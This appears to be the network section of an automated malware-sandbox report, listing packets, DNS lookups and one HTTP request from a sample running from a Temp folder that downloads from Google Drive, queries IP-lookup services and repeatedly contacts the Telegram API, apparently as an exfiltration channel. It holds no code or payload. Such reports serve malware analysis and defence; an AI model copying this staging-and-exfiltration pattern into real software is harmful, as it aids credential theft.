Dec 2, 2024 16:15:00.870192051 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.870356083 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.870393038 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.871622086 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.871669054 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.873006105 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.873050928 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.873096943 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.873136997 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.873142958 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.873192072 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.874214888 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.874255896 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.875565052 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.875611067 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.875634909 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.875672102 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.876769066 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.876810074 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.876913071 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.876952887 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.878026962 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.878078938 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.881409883 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.881459951 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.881499052 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.881547928 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.881946087 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.881990910 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.882906914 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.882956028 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.883021116 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.883065939 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.884133101 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.884195089 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.901091099 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.901278973 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.901293993 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.901350021 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.901612997 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.901664972 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.901707888 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:00.901763916 CET	443	49737	142.250.181.129	192.168.2.4
Dec 2, 2024 16:15:00.901813030 CET	49737	443	192.168.2.4	142.250.181.129
Dec 2, 2024 16:15:01.585035086 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:01.705128908 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:01.705288887 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:01.705703974 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:01.825622082 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:08.233998060 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:08.253102064 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:08.373191118 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:08.971946001 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:09.022614956 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:09.439922094 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:09.439965963 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:09.440165997 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:09.441998959 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:09.442014933 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:10.668412924 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:10.668479919 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:10.672053099 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:10.672058105 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:10.672441959 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:10.675556898 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:10.723341942 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:11.144301891 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:11.144370079 CET	443	49766	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:11.144449949 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:11.150968075 CET	49766	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:11.173847914 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:11.293780088 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:11.668648958 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:11.678132057 CET	49772	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:11.678160906 CET	443	49772	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:11.678229094 CET	49772	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:11.678613901 CET	49772	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:11.678623915 CET	443	49772	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:11.710104942 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:12.938386917 CET	443	49772	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:12.940257072 CET	49772	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:12.940277100 CET	443	49772	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:13.419796944 CET	443	49772	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:13.419902086 CET	443	49772	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:13.419965982 CET	49772	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:13.420497894 CET	49772	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:13.440851927 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:13.441991091 CET	49778	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:13.561155081 CET	80	49745	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:13.561872959 CET	80	49778	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:13.561969995 CET	49745	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:13.562004089 CET	49778	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:13.562160969 CET	49778	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:13.682373047 CET	80	49778	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:15.057388067 CET	80	49778	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:15.058953047 CET	49779	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:15.059015036 CET	443	49779	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:15.059076071 CET	49779	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:15.059403896 CET	49779	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:15.059421062 CET	443	49779	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:15.100740910 CET	49778	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:16.275722980 CET	443	49779	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:16.277509928 CET	49779	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:16.277548075 CET	443	49779	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:16.737543106 CET	443	49779	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:16.737621069 CET	443	49779	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:16.737668037 CET	49779	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:16.738394022 CET	49779	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:16.794399023 CET	49785	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:16.914397955 CET	80	49785	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:16.914527893 CET	49785	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:16.914670944 CET	49785	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:17.034529924 CET	80	49785	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:18.656021118 CET	80	49785	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:18.657485008 CET	49790	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:18.657522917 CET	443	49790	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:18.657589912 CET	49790	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:18.657875061 CET	49790	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:18.657891989 CET	443	49790	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:18.710135937 CET	49785	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:19.915769100 CET	443	49790	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:19.917561054 CET	49790	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:19.917592049 CET	443	49790	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:20.385404110 CET	443	49790	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:20.385478973 CET	443	49790	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:20.385541916 CET	49790	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:20.386059999 CET	49790	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:20.410005093 CET	49785	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:20.411202908 CET	49795	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:20.532268047 CET	80	49785	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:20.532385111 CET	49785	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:20.533082962 CET	80	49795	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:20.533164024 CET	49795	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:20.533407927 CET	49795	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:20.653667927 CET	80	49795	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:22.028032064 CET	80	49795	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:22.029530048 CET	49797	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:22.029580116 CET	443	49797	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:22.029644012 CET	49797	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:22.029911041 CET	49797	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:22.029923916 CET	443	49797	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:22.069492102 CET	49795	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:23.287336111 CET	443	49797	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:23.289226055 CET	49797	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:23.289262056 CET	443	49797	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:23.789566994 CET	443	49797	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:23.789639950 CET	443	49797	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:23.789717913 CET	49797	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:23.790194035 CET	49797	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:23.817563057 CET	49795	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:23.818552017 CET	49802	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:23.938105106 CET	80	49795	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:23.938179970 CET	49795	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:23.938604116 CET	80	49802	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:23.938690901 CET	49802	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:23.938836098 CET	49802	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:24.058746099 CET	80	49802	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:25.412378073 CET	80	49802	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:25.414010048 CET	49808	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:25.414050102 CET	443	49808	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:25.414114952 CET	49808	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:25.414382935 CET	49808	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:25.414396048 CET	443	49808	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:25.460160971 CET	49802	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:26.677839994 CET	443	49808	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:26.682204962 CET	49808	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:26.682241917 CET	443	49808	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:27.181318045 CET	443	49808	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:27.181384087 CET	443	49808	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:27.181756020 CET	49808	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:27.182055950 CET	49808	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:27.201011896 CET	49802	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:27.202227116 CET	49813	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:27.321633101 CET	80	49802	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:27.321748018 CET	49802	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:27.322272062 CET	80	49813	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:27.322348118 CET	49813	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:27.322514057 CET	49813	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:27.442536116 CET	80	49813	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:29.767723083 CET	80	49813	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:29.768884897 CET	49818	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:29.768907070 CET	443	49818	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:29.768989086 CET	49818	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:29.769249916 CET	49818	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:29.769263029 CET	443	49818	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:29.819556952 CET	49813	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:30.985186100 CET	443	49818	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:30.986866951 CET	49818	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:30.986881971 CET	443	49818	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:31.451370001 CET	443	49818	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:31.451430082 CET	443	49818	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:31.451482058 CET	49818	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:31.451982021 CET	49818	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:31.717325926 CET	49813	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:31.725639105 CET	49822	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:31.837878942 CET	80	49813	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:31.838072062 CET	49813	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:31.845841885 CET	80	49822	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:31.846096039 CET	49822	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:31.848694086 CET	49822	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:31.969058037 CET	80	49822	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:33.322443008 CET	80	49822	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:33.323678970 CET	49826	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:33.323688030 CET	443	49826	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:33.323764086 CET	49826	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:33.323978901 CET	49826	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:33.323992014 CET	443	49826	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:33.366467953 CET	49822	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:34.645534992 CET	443	49826	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:34.647392035 CET	49826	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:34.647438049 CET	443	49826	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:35.123020887 CET	443	49826	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:35.123095989 CET	443	49826	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:35.123231888 CET	49826	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:35.123871088 CET	49826	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:35.147094011 CET	49822	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:35.148246050 CET	49829	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:35.267568111 CET	80	49822	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:35.267627954 CET	49822	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:35.268243074 CET	80	49829	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:35.268326044 CET	49829	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:35.268507004 CET	49829	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:35.388535023 CET	80	49829	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:36.781102896 CET	80	49829	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:36.782597065 CET	49834	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:36.782646894 CET	443	49834	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:36.782737017 CET	49834	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:36.782998085 CET	49834	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:36.783010006 CET	443	49834	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:36.835186958 CET	49829	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:38.051265001 CET	443	49834	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:38.053221941 CET	49834	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:38.053261042 CET	443	49834	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:38.519488096 CET	443	49834	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:38.519560099 CET	443	49834	172.67.177.134	192.168.2.4
Dec 2, 2024 16:15:38.519608974 CET	49834	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:38.520165920 CET	49834	443	192.168.2.4	172.67.177.134
Dec 2, 2024 16:15:38.634038925 CET	49829	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:38.754659891 CET	80	49829	132.226.8.169	192.168.2.4
Dec 2, 2024 16:15:38.754865885 CET	49829	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:38.773392916 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:38.773439884 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:38.773547888 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:38.774027109 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:38.774041891 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.186646938 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.186738968 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:40.188431025 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:40.188447952 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.188688040 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.189966917 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:40.235347986 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.699534893 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.699620962 CET	443	49839	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:40.699673891 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:40.701879025 CET	49839	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:46.739794970 CET	49778	80	192.168.2.4	132.226.8.169
Dec 2, 2024 16:15:47.258611917 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:47.258666039 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:47.259341955 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:47.259341955 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:47.259387970 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:48.679929018 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:48.682018995 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:48.682055950 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:48.682111979 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:48.682120085 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:49.276773930 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:49.276987076 CET	443	49855	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:49.277051926 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:49.277515888 CET	49855	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:50.824475050 CET	49863	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:50.824517965 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:50.824598074 CET	49863	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:50.824882030 CET	49863	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:50.824898005 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:52.233424902 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:52.235183954 CET	49863	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:52.235204935 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:52.235244036 CET	49863	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:52.235259056 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:52.890965939 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:52.891058922 CET	443	49863	149.154.167.220	192.168.2.4
Dec 2, 2024 16:15:52.891117096 CET	49863	443	192.168.2.4	149.154.167.220
Dec 2, 2024 16:15:52.891788960 CET	49863	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 16:14:52.240839958 CET	58351	53	192.168.2.4	1.1.1.1
Dec 2, 2024 16:14:52.379827976 CET	53	58351	1.1.1.1	192.168.2.4
Dec 2, 2024 16:14:55.195259094 CET	55687	53	192.168.2.4	1.1.1.1
Dec 2, 2024 16:14:55.332689047 CET	53	55687	1.1.1.1	192.168.2.4
Dec 2, 2024 16:15:01.425570011 CET	50005	53	192.168.2.4	1.1.1.1
Dec 2, 2024 16:15:01.566324949 CET	53	50005	1.1.1.1	192.168.2.4
Dec 2, 2024 16:15:09.297750950 CET	61795	53	192.168.2.4	1.1.1.1
Dec 2, 2024 16:15:09.438838959 CET	53	61795	1.1.1.1	192.168.2.4
Dec 2, 2024 16:15:38.634716034 CET	55479	53	192.168.2.4	1.1.1.1
Dec 2, 2024 16:15:38.772115946 CET	53	55479	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 16:14:52.240839958 CET	192.168.2.4	1.1.1.1	0x12e1	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:14:55.195259094 CET	192.168.2.4	1.1.1.1	0xbb54	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:01.425570011 CET	192.168.2.4	1.1.1.1	0xd55d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:09.297750950 CET	192.168.2.4	1.1.1.1	0x14fe	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:38.634716034 CET	192.168.2.4	1.1.1.1	0x8adc	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 16:14:52.379827976 CET	1.1.1.1	192.168.2.4	0x12e1	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:14:55.332689047 CET	1.1.1.1	192.168.2.4	0xbb54	No error (0)	drive.usercontent.google.com		142.250.181.129	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:01.566324949 CET	1.1.1.1	192.168.2.4	0xd55d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 2, 2024 16:15:01.566324949 CET	1.1.1.1	192.168.2.4	0xd55d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:01.566324949 CET	1.1.1.1	192.168.2.4	0xd55d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:01.566324949 CET	1.1.1.1	192.168.2.4	0xd55d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:01.566324949 CET	1.1.1.1	192.168.2.4	0xd55d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:01.566324949 CET	1.1.1.1	192.168.2.4	0xd55d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:09.438838959 CET	1.1.1.1	192.168.2.4	0x14fe	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:09.438838959 CET	1.1.1.1	192.168.2.4	0x14fe	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 2, 2024 16:15:38.772115946 CET	1.1.1.1	192.168.2.4	0x8adc	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49745	132.226.8.169	80	7852	C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe

Timestamp	Bytes transferred	Direction	Data
Dec 2, 2024 16:15:01.705703974 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
